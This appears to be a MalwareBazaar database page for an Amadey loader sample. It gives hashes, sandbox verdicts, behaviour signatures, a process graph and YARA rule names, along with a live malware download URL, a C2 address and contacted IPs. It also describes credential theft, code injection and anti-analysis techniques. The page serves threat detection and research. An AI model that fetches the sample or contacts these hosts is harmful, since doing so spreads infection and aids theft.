MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Amadey


Vendor detections: 17


Intelligence 17 IOCs YARA 8 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76
SHA3-384 hash: 508bdda156bc61fea06d5db2f7636133196493e529f5c2281eae57589e54682c806c4dc30a9e5bda52f2b9ccca340f9c
SHA1 hash: f82a8c33fa2dbf8fc327be0dfd764660252d1d74
MD5 hash: b140d0e0a9bfb0c0be35c9c605d046c1
humanhash: spaghetti-gee-equal-sodium
File name:file
Download: download sample
Signature Amadey
Create hunting rule
File size:1'939'456 bytes
First seen:2024-06-23 03:48:30 UTC
Last seen:2024-06-23 04:21:51 UTC
File type:Executable exe
MIME type:application/x-dosexec
imphash 2eabe9054cad5152567f0699947a2c5b (2'852 x LummaStealer, 1'312 x Stealc, 1'026 x Healer)
ssdeep 49152:6pu/+DBuLQmTEPEpEw+Lyak4YUjd0hmEQY0eBJ:3/+MsmBpEw+k+WmED
TLSH T17B95330D1CE01EE8C7A014FA5AC3BBC33866700624DFD12F51516A7BF1B6EB9775A988
TrID 29.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
22.7% (.EXE) Win16 NE executable (generic) (5038/12/1)
20.3% (.EXE) Win32 Executable (generic) (4504/4/1)
9.1% (.EXE) OS/2 Executable (generic) (2029/13)
9.0% (.EXE) Generic Win/DOS Executable (2002/3)
Reporter Bitsight
Tags:Amadey exe


Avatar
Bitsight
url: http://77.91.77.81/soka/random.exe

Intelligence

File Origin
# of uploads :
2
# of downloads :
364
Origin country :
US US
Vendor Threat Intelligence
Malware family:
amadey
Create hunting rule
ID:
1
File name:
67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76.exe
Verdict:
Malicious activity
Analysis date:
2024-06-23 03:50:47 UTC
Tags:
amadey botnet stealer loader meta metastealer redline lumma themida remote xworm evasion exela smokeloader vodkagats python djvu ransomware stop raccoonclipper
Link:
https://app.any.run/tasks/831c893b-acfa-4f49-a044-ef04e5574bae

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
SecuriteInfo.com.Win32.TrojanX-gen.5510.4654.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
81.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=66779b302321b2855acdb869win7simulatehigh_evasion
Tags:
Banker Stealth Dexter
Result
Verdict:
Malware
Maliciousness:

Behaviour
Сreating synchronization primitives
Searching for analyzing tools
Searching for the window
Creating a file
Creating a window
Searching for synchronization primitives
Creating a file in the %temp% subdirectories
Creating a process from a recently created file
Creating a process with a hidden window
Connection attempt to an infection source
Enabling autorun by creating a file
Sending an HTTP POST request to an infection source
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
anti-vm microsoft_visual_cc packed
Link:
https://www.filescan.io/uploads/66779b2f0bf5978c0b118b02/reports/2fbf9395-8bf0-45f7-824a-fbcf1a67f79c/overview
Verdict:
Malicious
Labled as:
Trojan.Generic
Link:
https://www.hybrid-analysis.com/sample/67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Verdict:
Suspicious
Link:
https://analyze.intezer.com/analyses/be2a63c4-5e65-41b2-9299-378a0f9c19a8
Result
Threat name:
LummaC, Python Stealer, Amadey, Monster
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1461206
Signature
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected unpacking (changes PE section rights)
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Powershell downloading file from url shortener site
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Generic Python Stealer
Yara detected Monster Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected XWorm
Yara detected zgRAT
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1461206 Sample: file.exe Startdate: 23/06/2024 Architecture: WINDOWS Score: 100 202 Found malware configuration 2->202 204 Malicious sample detected (through community Yara rule) 2->204 206 Antivirus detection for dropped file 2->206 208 22 other signatures 2->208 11 file.exe 5 2->11         started        15 Hkbsse.exe 2->15         started        17 axplong.exe 2->17         started        19 5 other processes 2->19 process3 dnsIp4 152 C:\Users\user\AppData\Local\...\axplong.exe, PE32 11->152 dropped 154 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 11->154 dropped 282 Detected unpacking (changes PE section rights) 11->282 284 Tries to evade debugger and weak emulator (self modifying code) 11->284 286 Tries to detect virtualization through RDTSC time measurements 11->286 288 Potentially malicious time measurement code found 11->288 22 axplong.exe 43 11->22         started        156 C:\Users\user\AppData\Local\Temp\...\1.exe, PE32 15->156 dropped 158 C:\Users\user\AppData\Local\...\1[1].exe, PE32 15->158 dropped 27 1.exe 15->27         started        290 Hides threads from debuggers 17->290 292 Tries to detect sandboxes / dynamic malware analysis system (registry check) 17->292 294 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->294 172 184.28.90.27 AKAMAI-ASUS United States 19->172 174 127.0.0.1 unknown unknown 19->174 176 2 other IPs or domains 19->176 29 chrome.exe 19->29         started        31 WerFault.exe 19->31         started        33 chrome.exe 19->33         started        file5 signatures6 process7 dnsIp8 178 185.172.128.116 NADYMSS-ASRU Russian Federation 22->178 180 140.82.121.4 GITHUBUS United States 22->180 186 2 other IPs or domains 22->186 134 C:\Users\user\AppData\Local\...\googleads.exe, PE32 22->134 dropped 136 C:\Users\user\AppData\Local\...\judit.exe, PE32+ 22->136 dropped 138 C:\Users\user\AppData\...\taskweaker.exe, PE32+ 22->138 dropped 140 17 other malicious files 22->140 dropped 266 Multi AV Scanner detection for dropped file 22->266 268 Detected unpacking (changes PE section rights) 22->268 270 Tries to detect sandboxes and other dynamic analysis tools (window names) 22->270 278 5 other signatures 22->278 35 judit.exe 22->35         started        39 deep.exe 8 22->39         started        41 gold.exe 22->41         started        46 7 other processes 22->46 272 Machine Learning detection for dropped file 27->272 274 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 27->274 276 Maps a DLL or memory area into another process 27->276 280 3 other signatures 27->280 43 explorer.exe 27->43 injected 182 142.250.186.130 GOOGLEUS United States 29->182 184 142.250.186.68 GOOGLEUS United States 29->184 188 7 other IPs or domains 29->188 file9 signatures10 process11 dnsIp12 120 C:\Users\user\AppData\...\_quoting_c.pyd, PE32+ 35->120 dropped 122 C:\Users\user\AppData\...\vcruntime140.dll, PE32+ 35->122 dropped 124 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 35->124 dropped 132 32 other files (31 malicious) 35->132 dropped 236 Multi AV Scanner detection for dropped file 35->236 238 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 35->238 48 stub.exe 35->48         started        126 C:\Users\user\AppData\...\da_protected.exe, PE32 39->126 dropped 240 Machine Learning detection for dropped file 39->240 53 da_protected.exe 39->53         started        242 Contains functionality to inject code into remote processes 41->242 244 Writes to foreign memory regions 41->244 258 2 other signatures 41->258 55 RegAsm.exe 41->55         started        196 186.4.194.68 TelconetSAEC Ecuador 43->196 198 212.112.110.243 AKNET-ASKG Kyrgyzstan 43->198 128 C:\Users\user\AppData\Roaming\fjebrgc, PE32 43->128 dropped 246 System process connects to network (likely due to code injection or exploit) 43->246 248 Benign windows process drops PE files 43->248 250 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->250 200 185.215.113.67 WHOLESALECONNECTIONSNL Portugal 46->200 130 C:\Users\user\AppData\Local\...\Hkbsse.exe, PE32 46->130 dropped 252 Antivirus detection for dropped file 46->252 254 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 46->254 256 Found many strings related to Crypto-Wallets (likely being stolen) 46->256 260 4 other signatures 46->260 57 cmd.exe 46->57         started        59 BitLockerToGo.exe 46->59         started        61 RegAsm.exe 46->61         started        63 4 other processes 46->63 file13 signatures14 process15 dnsIp16 160 208.95.112.1 TUT-ASUS United States 48->160 162 65.0.21.192 AMAZON-02US United States 48->162 112 C:\Users\user\AppData\Local\...\Monster.exe, PE32+ 48->112 dropped 114 C:\Users\user\AppData\...\system_info.txt, Algol 48->114 dropped 232 2 other signatures 48->232 65 cmd.exe 48->65         started        67 cmd.exe 48->67         started        69 cmd.exe 48->69         started        81 7 other processes 48->81 164 195.2.71.70 VDSINA-ASRU Russian Federation 53->164 116 C:\Users\user\AppData\Local\Temp\izhfef.exe, PE32+ 53->116 dropped 210 Multi AV Scanner detection for dropped file 53->210 212 Detected unpacking (changes PE section rights) 53->212 214 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 53->214 234 4 other signatures 53->234 71 izhfef.exe 53->71         started        166 4.185.27.237 LEVEL3US United States 55->166 216 Found many strings related to Crypto-Wallets (likely being stolen) 55->216 218 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 55->218 220 Tries to harvest and steal browser information (history, passwords, etc) 55->220 118 C:\Users\user\AppData\Local\...\install.bat, ASCII 57->118 dropped 222 Suspicious powershell command line found 57->222 224 Uses schtasks.exe or at.exe to add and modify task schedules 57->224 226 Uses attrib.exe to hide files 57->226 75 powershell.exe 57->75         started        77 powershell.exe 57->77         started        83 4 other processes 57->83 168 188.114.96.3 CLOUDFLARENETUS European Union 59->168 228 Query firmware table information (likely to detect VMs) 59->228 230 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 61->230 79 conhost.exe 61->79         started        170 20.42.73.29 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 63->170 file17 signatures18 process19 dnsIp20 85 conhost.exe 65->85         started        87 WMIC.exe 65->87         started        89 conhost.exe 67->89         started        91 tasklist.exe 67->91         started        99 2 other processes 69->99 190 172.67.198.131 CLOUDFLARENETUS United States 71->190 142 C:\Users\user\AppData\Local\Temp\setup.exe, PE32+ 71->142 dropped 144 C:\Users\user\AppData\Local\...\setup[1].exe, PE32+ 71->144 dropped 146 C:\Users\user\AppData\Local\...\setup[4].exe, PE32+ 71->146 dropped 150 3 other malicious files 71->150 dropped 93 cmd.exe 75->93         started        95 Conhost.exe 75->95         started        148 C:\Users\user\AppData\Local\Corporation.zip, Zip 77->148 dropped 97 conhost.exe 81->97         started        101 6 other processes 81->101 192 67.199.248.11 GOOGLE-PRIVATE-CLOUDUS United States 83->192 194 54.67.42.145 AMAZON-02US United States 83->194 file21 process22 process23 103 reg.exe 93->103         started        106 conhost.exe 93->106         started        108 schtasks.exe 93->108         started        110 2 other processes 93->110 signatures24 262 Disable Task Manager(disabletaskmgr) 103->262 264 Disables the Windows task manager (taskmgr) 103->264
Score:
100%
Verdict:
Malware
File Type:
PE
Link:
https://malprob.io/report/67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76
Detection:
smokeloader
Create hunting rule
Link:
https://mwdb.cert.pl/sample/67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76/
Threat name:
Win32.Spyware.Lummastealer
Create hunting rule
Status:
Malicious
First seen:
2024-06-23 03:49:06 UTC
File Type:
PE (Exe)
Extracted files:
1
AV detection:
20 of 24 (83.33%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=m53s44xkmu3cksxpk2d2n3wcvqbtpsawtarz5d54ccnzkn4qxz3a._file
Verdict:
malicious
Result
Malware family:
amadey
Create hunting rule
Score:
  10/10
Tags:
family:amadey botnet:e76b71 evasion trojan
Link:
https://tria.ge/reports/240623-edca9ssfkp/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Drops file in Windows directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Identifies Wine through registry keys
Loads dropped DLL
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Amadey
Malware Config
C2 Extraction:
http://77.91.77.81
Unpacked files
SH256 hash:
b30a1eba5678dd3ea841e4aa62300a74cdcb33690e350dcc1ce9c743c11046d4
MD5 hash:
a904790a18785bfd6fb80683d44d5691
SHA1 hash:
1a4835f1594ab41ba6a6bb4255e4c727beb4fa34
Detections:
win_amadey
Create hunting rule
Link:
https://www.unpac.me/results/72ff467c-f78f-493d-b007-78ebc938ac9c/
SH256 hash:
67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76
MD5 hash:
b140d0e0a9bfb0c0be35c9c605d046c1
SHA1 hash:
f82a8c33fa2dbf8fc327be0dfd764660252d1d74
Link:
https://www.unpac.me/results/72ff467c-f78f-493d-b007-78ebc938ac9c/
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/67772e72ea65/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Amadey
Create hunting rule
Author:kevoreilly
Description:Amadey Payload
Rule name:maldoc_find_kernel32_base_method_1
Create hunting rule
Author:Didier Stevens (https://DidierStevens.com)
Rule name:maldoc_getEIP_method_1
Create hunting rule
Author:Didier Stevens (https://DidierStevens.com)
Rule name:MD5_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:meth_get_eip
Create hunting rule
Author:Willi Ballenthin
Rule name:vmdetect
Create hunting rule
Author:nex
Description:Possibly employs anti-virtualization techniques
Rule name:Windows_Generic_Threat_bd24be68
Create hunting rule
Author:Elastic Security
Rule name:win_amadey_a9f4
Create hunting rule
Author:Johannes Bader
Description:matches unpacked Amadey samples

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Amadey

Executable exe 67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76

(this sample)

  
Dropped by
Privateloader
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/2888729/
  
URLhaus
https://urlhaus.abuse.ch/url/2874927/
  
URLhaus
https://urlhaus.abuse.ch/url/2888751/

BLint

The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
IDTitleSeverity
CHECK_AUTHENTICODEMissing Authenticodehigh
CHECK_DLL_CHARACTERISTICSMissing dll Security Characteristics (HIGH_ENTROPY_VA)high
CHECK_NXMissing Non-Executable Memory Protectioncritical

Comments